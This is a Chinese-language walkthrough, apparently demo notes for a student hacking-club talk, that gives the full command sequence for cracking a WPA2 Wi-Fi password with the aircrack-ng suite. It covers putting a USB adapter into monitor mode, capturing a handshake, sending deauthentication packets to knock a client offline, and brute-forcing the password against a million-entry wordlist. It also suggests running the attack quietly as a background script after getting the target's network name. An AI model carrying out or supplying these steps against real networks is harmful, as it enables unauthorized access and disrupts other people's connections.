Author: Junner Date: 12/05/2024 Code: https://github.com/HackerSir/My-Waifu-Is-Not-Safe Description: HackMd 簡報:https://hackmd.io/@JunnerX/My-Waifu-Is-Not-Safe-Presentation
用 root 權限執行,密碼是 kali
。
打開 managed mode 與測試
ifconfig wlan0 down
airmon-ng check kill
iwconfig wlan0 mode monitor
ifconfig wlan0 up
airmon-ng start wlan0
aireplay-ng --test wlan0
獲得目標的 MAC 與 ACK
airodump-ng --essid alEx wlan0
airodump-ng --bssid 6A:D1:4D:7D:BE:72 -w /home/kali/Desktop/nets/test1/ wlan0
aireplay-ng -0 20 -a 6A:D1:4D:7D:BE:72 -c 50:C2:E8:0B:44:55 wlan0
aircrack-ng -a2 -b 6A:D1:4D:7D:BE:72 -w /home/kali/Desktop/passwords/10-million-password-list-top-1000000.txt /home/kali/Desktop/nets/test1/*.cap
用管理員權限運行 VMware Workstation
當 usb 裝置插入時,這個視窗將會彈出。選擇 Connect to Virtual machine
> 選擇目標虛擬機器。
如果你透過執行「lsusb」看到該設備名稱,但沒有看到它出現在「iwconfig」中,請重複執行上述步驟,或檢查下方的網路設定。如果執行了多次但仍看不到該設備,請重新啟動虛擬機器。
Edit
> Virtual Network Editor
不需要 bridge
VM
> Settings
> Network Adapter
通常 usb 裝置名稱會識別為 VMnet0
這樣設定就完成了。享受你的攻擊之旅吧!
首先,終端機要開啟 root 權限,密碼是 kali
。
為了攻擊,需要為 usb 裝置打開 monitor mode
ifconfig wlan0 down
運行這個後,設備將會連不到網路。
airmon-ng check kill
iwconfig wlan0 mode monitor
ifconfig wlan0 up
airmon-ng start wlan0
為了測試 monitor mode 已經成功啟用:
aireplay-ng --test wlan0
如果看到「Injection is working!」,那就是成功了。
airmon-ng stop wlan0
ifconfig wlan0 down
因為你關閉了網路管理員,要恢復的話就跑:
service NetworkManager restart
For ex, the target has name alEx
.
airodump-ng --essid alEx wlan0
You'll see the BSSID
at the top left. Ctrl+C
to interrupt it and copy the address: 6A:D1:4D:7D:BE:72
airodump-ng --bssid 6A:D1:4D:7D:BE:72 -c 1 -w /home/kali/Desktop/nets/test1 wlan0
檔案會儲存在 /home/kali/Desktop/nets/
,並有著 test1
的前綴。
等待 5 至 30 秒,STATION
的下方將會出現一些地址。
開啟另外一個終端機,而上一個執行的指令必須還在執行中,毋須關閉。
aireplay-ng -0 20 -a 6A:D1:4D:7D:BE:72 -c 50:C2:E8:0B:44:55 wlan0
ACK 的副檔名是 .cap
。通常最新的檔案的名稱會包含著最大的數字。
然後!爆破!
aircrack-ng -a2 -b 6A:D1:4D:7D:BE:72 -w /home/kali/Desktop/passwords/10-million-password-list-top-1000000.txt /home/kali/Desktop/nets/test1*.cap
基本上大部分情況都會被處理,如果還是爆開就...用上面的指令打,因為用上面的指令還比較有展示性一點,但如果用 script 就能悄悄的攻擊,兩種不一樣的方式。
所以如果可以的話,先問他們 wifi 名稱,放到 script 裡面讓他背景執行。如果真的不行的話再手動打,現場展示。
基本上會改的部分就是 target
、file_path
、passwordSet_path
。
主要:
target
:要攻擊的目標名稱。
其他還有像是:
file_path
:要儲存的檔案路徑。passwordSet_path
:密碼集文字檔的所在地。